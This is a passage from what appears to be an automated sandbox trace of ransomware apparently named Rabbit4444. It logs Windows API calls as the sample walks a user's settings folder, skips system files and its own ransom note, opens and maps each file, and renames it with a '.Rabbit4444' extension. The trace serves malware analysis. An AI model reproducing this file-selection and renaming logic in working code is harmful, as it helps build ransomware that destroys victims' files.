lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.237] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14954827138) returned 1 [0058.238] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1019) returned 1 [0058.238] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0058.238] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0058.238] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x700, lpName=0x0) returned 0x298 [0058.239] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x700) returned 0x70000 [0058.239] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.240] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0058.240] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.240] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0058.240] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.240] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0058.240] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.240] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0058.240] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14955073216) returned 1 [0058.240] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0058.240] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0058.240] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.240] CloseHandle (hObject=0x298) returned 1 [0058.240] CloseHandle (hObject=0x278) returned 1 [0058.240] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{08D48377-1C06-416D-B382-61E8D5F6CD18}.settingcontent-ms.Rabbit4444") returned 192 [0058.240] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{08D48377-1C06-416D-B382-61E8D5F6CD18}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{08d48377-1c06-416d-b382-61e8d5f6cd18}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{08D48377-1C06-416D-B382-61E8D5F6CD18}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{08d48377-1c06-416d-b382-61e8d5f6cd18}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.241] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x416f03ca, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x416f03ca, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2241abe6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3c6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{08EB53B7-3384-473A-8D2C-6C0E71F3BF34}.settingcontent-ms", cAlternateFileName="CLB2C7~1.SET")) returned 1 [0058.241] lstrcmpiW (lpString1="Classic_{08EB53B7-3384-473A-8D2C-6C0E71F3BF34}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.241] lstrcmpiW (lpString1="Classic_{08EB53B7-3384-473A-8D2C-6C0E71F3BF34}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.241] lstrcmpiW (lpString1="Classic_{08EB53B7-3384-473A-8D2C-6C0E71F3BF34}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.241] lstrcmpiW (lpString1="Classic_{08EB53B7-3384-473A-8D2C-6C0E71F3BF34}.settingcontent-ms", lpString2=".") returned 1 [0058.241] lstrcmpiW (lpString1="Classic_{08EB53B7-3384-473A-8D2C-6C0E71F3BF34}.settingcontent-ms", lpString2="..") returned 1 [0058.241] lstrcmpiW (lpString1="Classic_{08EB53B7-3384-473A-8D2C-6C0E71F3BF34}.settingcontent-ms", lpString2="windows") returned -1 [0058.241] lstrcmpiW (lpString1="Classic_{08EB53B7-3384-473A-8D2C-6C0E71F3BF34}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.241] lstrcmpiW (lpString1="Classic_{08EB53B7-3384-473A-8D2C-6C0E71F3BF34}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.241] lstrcmpiW (lpString1="Classic_{08EB53B7-3384-473A-8D2C-6C0E71F3BF34}.settingcontent-ms", lpString2="boot") returned 1 [0058.241] lstrcmpiW (lpString1="Classic_{08EB53B7-3384-473A-8D2C-6C0E71F3BF34}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.241] lstrcmpiW (lpString1="Classic_{08EB53B7-3384-473A-8D2C-6C0E71F3BF34}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.241] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{08EB53B7-3384-473A-8D2C-6C0E71F3BF34}.settingcontent-ms" | out: lpString1="Classic_{08EB53B7-3384-473A-8D2C-6C0E71F3BF34}.settingcontent-ms") returned="Classic_{08EB53B7-3384-473A-8D2C-6C0E71F3BF34}.settingcontent-ms" [0058.241] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{08EB53B7-3384-473A-8D2C-6C0E71F3BF34}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.242] lstrlenW (lpString="Classic_{08EB53B7-3384-473A-8D2C-6C0E71F3BF34}.settingcontent-ms") returned 64 [0058.242] lstrlenW (lpString="Rabbit4444") returned 10 [0058.242] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.242] lstrlenW (lpString=".dll") returned 4 [0058.242] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.242] lstrlenW (lpString=".lnk") returned 4 [0058.242] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.242] lstrlenW (lpString=".ini") returned 4 [0058.242] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.242] lstrlenW (lpString=".sys") returned 4 [0058.242] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.242] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{08EB53B7-3384-473A-8D2C-6C0E71F3BF34}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{08eb53b7-3384-473a-8d2c-6c0e71f3bf34}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.243] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.243] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14955330707) returned 1 [0058.243] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=966) returned 1 [0058.243] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0058.243] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0058.243] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6d0, lpName=0x0) returned 0x298 [0058.244] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6d0) returned 0x70000 [0058.245] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.245] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0058.245] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.245] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0058.245] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.245] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0058.245] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.245] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0058.245] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14955579445) returned 1 [0058.245] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0058.245] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0058.245] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.245] CloseHandle (hObject=0x298) returned 1 [0058.245] CloseHandle (hObject=0x278) returned 1 [0058.245] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{08EB53B7-3384-473A-8D2C-6C0E71F3BF34}.settingcontent-ms.Rabbit4444") returned 192 [0058.245] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{08EB53B7-3384-473A-8D2C-6C0E71F3BF34}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{08eb53b7-3384-473a-8d2c-6c0e71f3bf34}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{08EB53B7-3384-473A-8D2C-6C0E71F3BF34}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{08eb53b7-3384-473a-8d2c-6c0e71f3bf34}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.246] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41f487a1, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x41f487a1, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x231d0415, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3b5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="classic_{09bf6a57-7bf7-4389-8d6f-2bcf6a26bb4e}.settingcontent-ms", cAlternateFileName="CL03D8~1.SET")) returned 1 [0058.246] lstrcmpiW (lpString1="classic_{09bf6a57-7bf7-4389-8d6f-2bcf6a26bb4e}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.246] lstrcmpiW (lpString1="classic_{09bf6a57-7bf7-4389-8d6f-2bcf6a26bb4e}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.246] lstrcmpiW (lpString1="classic_{09bf6a57-7bf7-4389-8d6f-2bcf6a26bb4e}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.246] lstrcmpiW (lpString1="classic_{09bf6a57-7bf7-4389-8d6f-2bcf6a26bb4e}.settingcontent-ms", lpString2=".") returned 1 [0058.246] lstrcmpiW (lpString1="classic_{09bf6a57-7bf7-4389-8d6f-2bcf6a26bb4e}.settingcontent-ms", lpString2="..") returned 1 [0058.246] lstrcmpiW (lpString1="classic_{09bf6a57-7bf7-4389-8d6f-2bcf6a26bb4e}.settingcontent-ms", lpString2="windows") returned -1 [0058.246] lstrcmpiW (lpString1="classic_{09bf6a57-7bf7-4389-8d6f-2bcf6a26bb4e}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.246] lstrcmpiW (lpString1="classic_{09bf6a57-7bf7-4389-8d6f-2bcf6a26bb4e}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.246] lstrcmpiW (lpString1="classic_{09bf6a57-7bf7-4389-8d6f-2bcf6a26bb4e}.settingcontent-ms", lpString2="boot") returned 1 [0058.247] lstrcmpiW (lpString1="classic_{09bf6a57-7bf7-4389-8d6f-2bcf6a26bb4e}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.247] lstrcmpiW (lpString1="classic_{09bf6a57-7bf7-4389-8d6f-2bcf6a26bb4e}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.247] lstrcpyW (in: lpString1=0x130ec22, lpString2="classic_{09bf6a57-7bf7-4389-8d6f-2bcf6a26bb4e}.settingcontent-ms" | out: lpString1="classic_{09bf6a57-7bf7-4389-8d6f-2bcf6a26bb4e}.settingcontent-ms") returned="classic_{09bf6a57-7bf7-4389-8d6f-2bcf6a26bb4e}.settingcontent-ms" [0058.247] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\classic_{09bf6a57-7bf7-4389-8d6f-2bcf6a26bb4e}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.247] lstrlenW (lpString="classic_{09bf6a57-7bf7-4389-8d6f-2bcf6a26bb4e}.settingcontent-ms") returned 64 [0058.247] lstrlenW (lpString="Rabbit4444") returned 10 [0058.247] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.247] lstrlenW (lpString=".dll") returned 4 [0058.247] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.247] lstrlenW (lpString=".lnk") returned 4 [0058.247] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.247] lstrlenW (lpString=".ini") returned 4 [0058.247] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.247] lstrlenW (lpString=".sys") returned 4 [0058.247] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.247] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\classic_{09bf6a57-7bf7-4389-8d6f-2bcf6a26bb4e}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{09bf6a57-7bf7-4389-8d6f-2bcf6a26bb4e}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.248] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.248] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14955833940) returned 1 [0058.248] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=949) returned 1 [0058.248] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0058.248] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0058.248] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6c0, lpName=0x0) returned 0x298 [0058.250] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6c0) returned 0x70000 [0058.251] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.251] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0058.251] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.251] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0058.251] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.251] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0058.251] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.251] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0058.251] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14956213146) returned 1 [0058.251] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0058.251] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0058.252] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.252] CloseHandle (hObject=0x298) returned 1 [0058.252] CloseHandle (hObject=0x278) returned 1 [0058.252] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\classic_{09bf6a57-7bf7-4389-8d6f-2bcf6a26bb4e}.settingcontent-ms.Rabbit4444") returned 192 [0058.252] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\classic_{09bf6a57-7bf7-4389-8d6f-2bcf6a26bb4e}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{09bf6a57-7bf7-4389-8d6f-2bcf6a26bb4e}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\classic_{09bf6a57-7bf7-4389-8d6f-2bcf6a26bb4e}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{09bf6a57-7bf7-4389-8d6f-2bcf6a26bb4e}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.253] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x425fd18c, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x425fd18c, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x231aa1ba, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3c2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{0CDC534D-A9FF-450D-91D8-96C341ED44AA}.settingcontent-ms", cAlternateFileName="CLB9A0~1.SET")) returned 1 [0058.253] lstrcmpiW (lpString1="Classic_{0CDC534D-A9FF-450D-91D8-96C341ED44AA}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.253] lstrcmpiW (lpString1="Classic_{0CDC534D-A9FF-450D-91D8-96C341ED44AA}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.253] lstrcmpiW (lpString1="Classic_{0CDC534D-A9FF-450D-91D8-96C341ED44AA}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.253] lstrcmpiW (lpString1="Classic_{0CDC534D-A9FF-450D-91D8-96C341ED44AA}.settingcontent-ms", lpString2=".") returned 1 [0058.253] lstrcmpiW (lpString1="Classic_{0CDC534D-A9FF-450D-91D8-96C341ED44AA}.settingcontent-ms", lpString2="..") returned 1 [0058.253] lstrcmpiW (lpString1="Classic_{0CDC534D-A9FF-450D-91D8-96C341ED44AA}.settingcontent-ms", lpString2="windows") returned -1 [0058.253] lstrcmpiW (lpString1="Classic_{0CDC534D-A9FF-450D-91D8-96C341ED44AA}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.253] lstrcmpiW (lpString1="Classic_{0CDC534D-A9FF-450D-91D8-96C341ED44AA}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.253] lstrcmpiW (lpString1="Classic_{0CDC534D-A9FF-450D-91D8-96C341ED44AA}.settingcontent-ms", lpString2="boot") returned 1 [0058.253] lstrcmpiW (lpString1="Classic_{0CDC534D-A9FF-450D-91D8-96C341ED44AA}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.253] lstrcmpiW (lpString1="Classic_{0CDC534D-A9FF-450D-91D8-96C341ED44AA}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.253] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{0CDC534D-A9FF-450D-91D8-96C341ED44AA}.settingcontent-ms" | out: lpString1="Classic_{0CDC534D-A9FF-450D-91D8-96C341ED44AA}.settingcontent-ms") returned="Classic_{0CDC534D-A9FF-450D-91D8-96C341ED44AA}.settingcontent-ms" [0058.253] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{0CDC534D-A9FF-450D-91D8-96C341ED44AA}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.253] lstrlenW (lpString="Classic_{0CDC534D-A9FF-450D-91D8-96C341ED44AA}.settingcontent-ms") returned 64 [0058.253] lstrlenW (lpString="Rabbit4444") returned 10 [0058.253] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.253] lstrlenW (lpString=".dll") returned 4 [0058.253] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.253] lstrlenW (lpString=".lnk") returned 4 [0058.253] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.253] lstrlenW (lpString=".ini") returned 4 [0058.253] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.253] lstrlenW (lpString=".sys") returned 4 [0058.253] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.254] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{0CDC534D-A9FF-450D-91D8-96C341ED44AA}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{0cdc534d-a9ff-450d-91d8-96c341ed44aa}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.254] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.254] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14956480300) returned 1 [0058.254] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=962) returned 1 [0058.254] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0058.254] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0058.254] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6d0, lpName=0x0) returned 0x298 [0058.255] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6d0) returned 0x70000 [0058.256] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.256] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0058.256] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.256] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0058.256] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.256] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0058.256] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.256] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0058.256] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14956714523) returned 1 [0058.256] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0058.256] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0058.257] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.257] CloseHandle (hObject=0x298) returned 1 [0058.257] CloseHandle (hObject=0x278) returned 1 [0058.257] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{0CDC534D-A9FF-450D-91D8-96C341ED44AA}.settingcontent-ms.Rabbit4444") returned 192 [0058.257] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{0CDC534D-A9FF-450D-91D8-96C341ED44AA}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{0cdc534d-a9ff-450d-91d8-96c341ed44aa}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{0CDC534D-A9FF-450D-91D8-96C341ED44AA}.settingcontent-ms.Rabbit4444" (normalized: 